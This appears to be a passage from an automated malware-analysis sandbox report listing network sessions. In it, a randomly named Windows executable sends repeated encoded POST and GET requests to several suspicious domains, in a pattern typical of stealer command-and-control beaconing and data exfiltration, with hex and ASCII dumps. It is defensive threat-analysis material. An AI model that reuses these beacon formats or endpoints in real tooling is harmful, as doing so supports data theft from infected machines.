{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L822j4%2FRQq47RUc1g1Qw3tFce29EY7SEFXD9Y7ScWecxKf4P0D02zH3NbpJdUSHPJhtGc6%2FPzt%2FTMftU6Lcbwo9TjLHPHUiXEjORNM4%2Fzltyq8fp%2BTjGB0eckapBOX%2BPeqi84Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab0a9f9ba83a5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1376&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=446&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=00000000000 Data Raw: Data Ascii:
Nov 5, 2024 07:12:05.751610041 CET	23	IN	Data Raw: 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 0000&ts=0&x=0"0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49791	3.33.130.190	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:10.800744057 CET	714	OUT	POST /3c6w/ HTTP/1.1 Host: www.trifecta.center Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.trifecta.center Referer: http://www.trifecta.center/3c6w/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 41 48 78 6b 78 30 44 39 58 49 78 79 53 55 46 63 52 57 48 41 4a 76 7a 47 35 62 6d 51 6f 52 7a 5a 4b 77 66 34 57 72 38 4a 58 6e 6a 54 74 37 4f 47 4f 73 30 41 41 4d 62 6a 50 67 43 67 78 43 55 72 47 4b 70 73 36 56 62 63 67 74 56 31 6a 30 74 4e 45 44 59 36 51 53 76 67 49 47 41 30 42 4c 32 55 31 30 70 35 2b 4a 35 30 32 39 69 35 46 6f 42 6c 4a 35 76 6e 54 48 56 65 4f 6e 4c 31 4c 4b 38 56 4a 58 45 6e 51 36 74 47 5a 6a 41 54 57 4f 6c 79 58 6c 46 73 42 76 64 6a 2b 6a 66 76 6c 33 42 51 70 2b 4a 68 30 37 31 6d 43 35 34 31 72 4c 4d 4a 77 46 2b 30 6e 67 3d 3d Data Ascii: FLL4t=ILUXf4KRS20ZAHxkx0D9XIxySUFcRWHAJvzG5bmQoRzZKwf4Wr8JXnjTt7OGOs0AAMbjPgCgxCUrGKps6VbcgtV1j0tNEDY6QSvgIGA0BL2U10p5+J5029i5FoBlJ5vnTHVeOnL1LK8VJXEnQ6tGZjATWOlyXlFsBvdj+jfvl3BQp+Jh071mC541rLMJwF+0ng==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49807	3.33.130.190	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:13.420289993 CET	734	OUT	POST /3c6w/ HTTP/1.1 Host: www.trifecta.center Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.trifecta.center Referer: http://www.trifecta.center/3c6w/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 42 6e 68 6b 38 33 72 39 44 59 78 78 4f 6b 46 63 62 32 48 4d 4a 75 50 47 35 61 53 41 70 6a 48 5a 4b 55 50 34 58 75 51 4a 55 6e 6a 54 35 72 4f 44 54 63 31 4d 41 4d 58 52 50 69 6d 67 78 44 30 72 47 4c 5a 73 36 6b 62 62 36 64 56 72 6f 55 74 4c 62 54 59 36 51 53 76 67 49 47 38 53 42 4c 75 55 31 45 5a 35 39 6f 35 7a 71 74 69 36 43 6f 42 6c 4e 35 76 6a 54 48 55 4c 4f 6d 57 65 4c 49 45 56 4a 57 30 6e 51 6f 4a 46 58 6a 41 56 4c 65 6b 6b 58 57 30 7a 59 71 51 65 2b 44 33 4d 72 55 5a 6a 6c 59 45 37 6c 4b 55 78 51 35 63 47 32 4d 46 39 39 47 44 39 38 6f 45 44 66 30 46 75 6f 6b 49 67 34 44 2b 38 76 43 74 37 7a 5a 63 3d Data Ascii: FLL4t=ILUXf4KRS20ZBnhk83r9DYxxOkFcb2HMJuPG5aSApjHZKUP4XuQJUnjT5rODTc1MAMXRPimgxD0rGLZs6kbb6dVroUtLbTY6QSvgIG8SBLuU1EZ59o5zqti6CoBlN5vjTHULOmWeLIEVJW0nQoJFXjAVLekkXW0zYqQe+D3MrUZjlYE7lKUxQ5cG2MF99GD98oEDf0FuokIg4D+8vCt7zZc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49822	3.33.130.190	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:16.032826900 CET	10816	OUT	POST /3c6w/ HTTP/1.1 Host: www.trifecta.center Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.trifecta.center Referer: http://www.trifecta.center/3c6w/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 42 6e 68 6b 38 33 72 39 44 59 78 78 4f 6b 46 63 62 32 48 4d 4a 75 50 47 35 61 53 41 70 6a 66 5a 4b 44 6e 34 57 4a 6b 4a 56 6e 6a 54 36 72 4f 43 54 63 31 46 41 4d 50 56 50 69 61 77 78 47 77 72 48 74 4e 73 74 47 2f 62 30 74 56 72 6e 30 74 4b 45 44 59 4b 51 53 2b 49 49 47 4d 53 42 4c 75 55 31 47 78 35 70 70 35 7a 6f 74 69 35 46 6f 42 35 4a 35 76 4c 54 48 4d 62 4f 6d 53 6f 4c 37 4d 56 4a 32 6b 6e 53 62 74 46 66 6a 41 58 4b 65 6b 73 58 57 34 57 59 71 6b 46 2b 44 7a 32 72 53 6c 6a 32 75 68 61 2f 35 51 4e 47 36 59 76 76 73 6c 4f 6d 33 66 4c 77 36 77 4d 59 57 31 33 71 32 49 78 2f 77 72 43 31 67 56 78 68 4f 58 50 53 37 44 45 79 33 33 52 75 31 51 70 2b 4a 6e 36 42 71 4a 56 62 58 41 51 2f 43 63 44 42 57 58 4b 78 39 58 48 73 36 45 77 55 2b 48 2b 71 63 74 6b 49 30 35 76 68 58 47 57 66 45 46 66 4a 6a 75 63 6e 70 36 48 45 42 6a 45 62 35 44 50 71 5a 51 64 55 32 41 74 4c 30 43 68 49 4e 6c 66 6f 6f 68 5a 47 6b 6f 68 70 78 7a 51 51 4c 50 58 58 36 35 6f 58 54 78 50 [TRUNCATED] Data Ascii: FLL4t=ILUXf4KRS20ZBnhk83r9DYxxOkFcb2HMJuPG5aSApjfZKDn4WJkJVnjT6rOCTc1FAMPVPiawxGwrHtNstG/b0tVrn0tKEDYKQS+IIGMSBLuU1Gx5pp5zoti5FoB5J5vLTHMbOmSoL7MVJ2knSbtFfjAXKeksXW4WYqkF+Dz2rSlj2uha/5QNG6YvvslOm3fLw6wMYW13q2Ix/wrC1gVxhOXPS7DEy33Ru1Qp+Jn6BqJVbXAQ/CcDBWXKx9XHs6EwU+H+qctkI05vhXGWfEFfJjucnp6HEBjEb5DPqZQdU2AtL0ChINlfoohZGkohpxzQQLPXX65oXTxPepwSgKxRpNCX7XRlVWHdbC5m0D3XG5oHU+RIkYUr11F05NuViRrFgNmM0hyS+f7QGVD+2rNRYvbp3th/EZamwI307LEjbH6M0QGK/RkYw8t+VoR1xNjDKWk/AewqDEuwrKu4VmNSFgjfCaDqWd5rnoGfeAw78x78znzO+t77emxn2PBYrBYAPq9x365qIxsAe1t5gcZX/usYQny+2QJjmZATL97c0Xz5B4kEt6v2cHaTc65e1Bn5Pm5lPCrhfAANWjvsCY2dzXstrhbtOG3rbm4DB1KaIobrlPDnrPxJxf1IG9qrInbI9d9DG6jRyiF52yY28ZZseQamRPSwhbJvO55iuhVk0+tlApK2AqCVH/jF8D/akwsS7QdaC19qrBZRgudkc6dZMaO5tKSZlc7kQS1wGwOJ0Er6Sg8VZuOoGoKr1WYInMp2EMOrGiTgZQEHfVygHEIh+S3TrvamkLztsFOy60KxkQOUP6n2nUTAlZWlxMOr4gpAjQAIkzwpLlzds91UiXz1PNXEOzpPqrtojAOXs9SHgJq1emw3sIp83fIPE70Ivy6CencJmwrTbumkW3gUivNGC/z5hZs9/y+Xq4CbGjpeAoylK2SohtVA1cdxOobz/WaXsMhEkz2ouV8ARrSz5acuL7XO98F5zhwo4aAZPL2WRifr3d [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49837	3.33.130.190	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:18.726574898 CET	448	OUT	GET /3c6w/?FLL4t=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.trifecta.center Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:12:19.336869955 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 05 Nov 2024 06:12:19 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4c 4c 34 74 3d 46 4a 38 33 63 4f 76 46 57 45 63 63 49 42 38 59 36 53 43 73 42 71 4a 67 4d 6c 46 53 4a 55 58 49 43 76 2f 6e 73 4c 36 37 68 41 37 50 55 42 62 50 63 59 55 65 4f 67 72 64 79 61 71 6d 48 39 5a 31 41 2b 4c 56 4d 52 43 4d 7a 47 30 65 4a 74 46 68 78 6c 6a 33 35 76 35 55 6e 7a 64 56 63 52 49 38 45 54 47 63 49 33 6c 31 4e 34 75 33 34 6b 35 57 74 64 38 50 68 4e 73 3d 26 65 7a 4b 3d 78 46 4f 78 56 50 62 30 55 7a 52 58 58 50 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FLL4t=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&ezK=xFOxVPb0UzRXXPy"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49874	154.23.184.95	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:24.774723053 CET	696	OUT	POST /rj0s/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.wcp95.top Referer: http://www.wcp95.top/rj0s/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 77 51 55 72 7a 45 44 70 64 49 32 4b 64 6d 57 4e 32 5a 73 36 72 63 37 30 43 56 2f 36 57 33 2f 51 68 45 52 5a 79 35 78 4b 38 4b 30 2f 50 63 51 31 79 4c 74 63 39 62 70 49 66 48 68 75 70 62 56 46 74 46 47 62 4f 6b 7a 31 64 65 7a 72 4b 75 43 48 4c 31 34 2f 4c 59 78 47 51 57 61 55 32 58 66 39 68 5a 49 53 37 43 67 61 48 6b 45 45 37 68 6b 38 65 4a 59 70 74 7a 7a 4a 6d 53 6a 4b 53 66 34 63 41 4d 69 4e 76 31 4e 4e 44 37 65 76 79 63 75 78 6a 79 41 69 51 72 63 55 47 4f 4e 6f 47 69 31 31 33 66 62 44 75 57 71 77 35 35 57 64 6c 76 76 46 4b 30 57 72 51 3d 3d Data Ascii: FLL4t=9y3LqfndcrGE1wQUrzEDpdI2KdmWN2Zs6rc70CV/6W3/QhERZy5xK8K0/PcQ1yLtc9bpIfHhupbVFtFGbOkz1dezrKuCHL14/LYxGQWaU2Xf9hZIS7CgaHkEE7hk8eJYptzzJmSjKSf4cAMiNv1NND7evycuxjyAiQrcUGONoGi113fbDuWqw55WdlvvFK0WrQ==
Nov 5, 2024 07:12:25.765630007 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:25 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49889	154.23.184.95	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:27.317367077 CET	716	OUT	POST /rj0s/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.wcp95.top Referer: http://www.wcp95.top/rj0s/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 54 49 55 70 55 77 44 68 64 49 78 47 39 6d 57 45 57 5a 6f 36 72 51 37 30 41 34 36 37 6a 6e 2f 51 41 30 52 61 77 64 78 4c 38 4b 30 77 76 64 59 34 53 4c 69 63 39 48 62 49 65 37 68 75 70 66 56 46 70 42 47 62 35 49 79 31 4e 65 31 79 61 75 41 4b 72 31 34 2f 4c 59 78 47 51 53 6b 55 33 2f 66 36 53 52 49 54 66 32 68 5a 48 6c 32 55 72 68 6b 75 75 49 54 70 74 7a 64 4a 6a 36 61 4b 51 33 34 63 41 38 69 44 65 31 4b 48 44 37 59 79 69 64 61 33 44 79 4a 6d 44 61 6f 62 31 4f 53 6e 6d 53 5a 77 78 53 42 53 66 33 39 69 35 64 6c 41 69 6d 62 49 4a 4a 66 77 51 34 76 64 6d 4d 71 2f 30 4e 69 57 56 54 71 33 57 5a 61 6f 6d 45 3d Data Ascii: FLL4t=9y3LqfndcrGE1TIUpUwDhdIxG9mWEWZo6rQ70A467jn/QA0RawdxL8K0wvdY4SLic9HbIe7hupfVFpBGb5Iy1Ne1yauAKr14/LYxGQSkU3/f6SRITf2hZHl2UrhkuuITptzdJj6aKQ34cA8iDe1KHD7Yyida3DyJmDaob1OSnmSZwxSBSf39i5dlAimbIJJfwQ4vdmMq/0NiWVTq3WZaomE=
Nov 5, 2024 07:12:28.268071890 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:28 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49903	154.23.184.95	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:29.866767883 CET	10798	OUT	POST /rj0s/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.wcp95.top Referer: http://www.wcp95.top/rj0s/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 79 33 4c 71 66 6e 64 63 72 47 45 31 54 49 55 70 55 77 44 68 64 49 78 47 39 6d 57 45 57 5a 6f 36 72 51 37 30 41 34 36 37 6a 76 2f 51 79 4d 52 41 52 64 78 49 38 4b 30 35 50 64 62 34 53 4c 46 63 39 50 66 49 65 32 61 75 72 58 56 46 4b 5a 47 4b 62 77 79 2b 4e 65 31 36 36 75 4e 48 4c 31 74 2f 4c 49 39 47 51 43 6b 55 33 2f 66 36 55 31 49 61 72 43 68 56 6e 6b 45 45 37 68 42 38 65 49 37 70 75 44 72 4a 6a 2b 56 4a 68 58 34 63 67 73 69 4f 4d 64 4b 46 6a 37 61 78 69 64 43 33 44 2f 52 6d 44 57 53 62 32 53 30 6e 6c 4f 5a 79 45 37 65 47 4f 66 45 77 6f 46 4a 5a 43 43 73 4d 62 35 4a 30 77 34 53 55 56 55 33 6b 77 52 62 62 46 71 67 6a 32 78 68 35 79 74 44 66 62 4a 6c 2f 71 38 6a 47 73 43 6e 6d 6d 42 41 79 61 4c 67 39 41 2b 75 6d 34 74 50 63 67 39 64 51 77 38 4f 67 4e 50 55 38 75 38 6f 71 4b 6a 66 38 62 54 65 7a 53 78 58 72 51 32 34 62 7a 77 6c 74 35 6f 52 46 30 62 74 4f 45 44 5a 4e 51 61 2f 2b 79 4e 33 6f 65 36 5a 34 73 79 37 70 4f 5a 47 62 4f 70 45 6e 59 4f 4a 46 59 6c 47 58 45 59 70 6c 53 75 32 [TRUNCATED] Data Ascii: FLL4t=9y3LqfndcrGE1TIUpUwDhdIxG9mWEWZo6rQ70A467jv/QyMRARdxI8K05Pdb4SLFc9PfIe2aurXVFKZGKbwy+Ne166uNHL1t/LI9GQCkU3/f6U1IarChVnkEE7hB8eI7puDrJj+VJhX4cgsiOMdKFj7axidC3D/RmDWSb2S0nlOZyE7eGOfEwoFJZCCsMb5J0w4SUVU3kwRbbFqgj2xh5ytDfbJl/q8jGsCnmmBAyaLg9A+um4tPcg9dQw8OgNPU8u8oqKjf8bTezSxXrQ24bzwlt5oRF0btOEDZNQa/+yN3oe6Z4sy7pOZGbOpEnYOJFYlGXEYplSu2CeoxhsibeYFsy0LvRSGqfVHQwEwxmfjWId+pNos/ILu42Ib1jYWFGLtIJLeLi3gQSbg+db+xbZgRdD5/7JjdSES2HtsTuQAWEq8oQJzebxhK+yJnLTg9KObwi96toXEElVhKCcBkInMOKOdg421rDaxDG80HhXjNF5VwP9kunpxotaHeYZ+2bhdILhp1eKD3EDK1/K6QCTxVv4EHicWs9GJAuf6bvXjkS163RIAKwnk3IO2aLxLOPHxL4bNzWIvnOR9jwztPO7zYfe9RPNG6qsh5g3+5GhGUXHznzVnMURyJduuoOlGaxRPEqgpB62vB/EDt80YTvwnS6MvJ/3OKrNu/I2hjd8U3DFgsnxyd+KVF9V+4EK4sqxWeUU0kX9OQY0wpb9eufuPYmCOup2fySy4oGJz8EZv8kibCwHQfwaHNtB38LIvh4hULGlU1ODXwODJ+jAeMp9ngPpHlTHLNaAD5vcZspcUNavzPGL07+cSKKN2oFXL3VaLNzQKa5VFmVhiXMIxmn3H/60F5E/3trKYa7+LpFsBSC1HKKl5ZuCbmHCU61llH7Tqs8/TQc7wzNtE9v/+dA0OtJckZr16uJUIgUjI4VeqMcqXtE28LLeoD+uv6k1pbfU/cWhj18A9voXLeYAaM9QnsNCLtWJE8+WFqpseAI8W0I7 [TRUNCATED]
Nov 5, 2024 07:12:30.864532948 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:30 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49917	154.23.184.95	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:32.402347088 CET	442	OUT	GET /rj0s/?FLL4t=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:12:33.579181910 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:33 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49953	172.67.185.22	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:38.659462929 CET	720	OUT	POST /xh7d/ HTTP/1.1 Host: www.gokulmohan.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.gokulmohan.online Referer: http://www.gokulmohan.online/xh7d/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 72 74 63 6e 6a 71 43 2b 61 63 57 2f 45 77 70 58 68 55 37 36 57 46 6d 38 56 64 38 37 4c 6f 32 49 49 79 50 2f 36 53 6d 6b 77 6a 41 47 61 66 2b 4d 64 36 57 4e 2f 57 42 56 38 44 4f 52 72 4b 71 58 4a 66 41 54 63 58 51 72 6c 2b 36 6d 39 77 47 62 4f 46 6a 64 6b 50 42 48 6e 2b 74 6e 62 2f 4b 49 35 48 4a 67 68 49 59 38 6f 66 58 73 58 56 6b 35 53 34 44 68 5a 46 6b 35 46 54 58 35 6c 66 4d 6a 31 6c 64 56 6d 62 77 49 75 41 46 6f 79 72 58 2b 56 34 53 79 66 79 62 2b 52 6c 53 34 65 6a 37 6f 5a 4e 43 45 69 42 4b 71 74 78 66 67 4e 73 66 72 78 6f 50 62 51 3d 3d Data Ascii: FLL4t=oZLX2YQvJ/hPbrtcnjqC+acW/EwpXhU76WFm8Vd87Lo2IIyP/6SmkwjAGaf+Md6WN/WBV8DORrKqXJfATcXQrl+6m9wGbOFjdkPBHn+tnb/KI5HJghIY8ofXsXVk5S4DhZFk5FTX5lfMj1ldVmbwIuAFoyrX+V4Syfyb+RlS4ej7oZNCEiBKqtxfgNsfrxoPbQ==
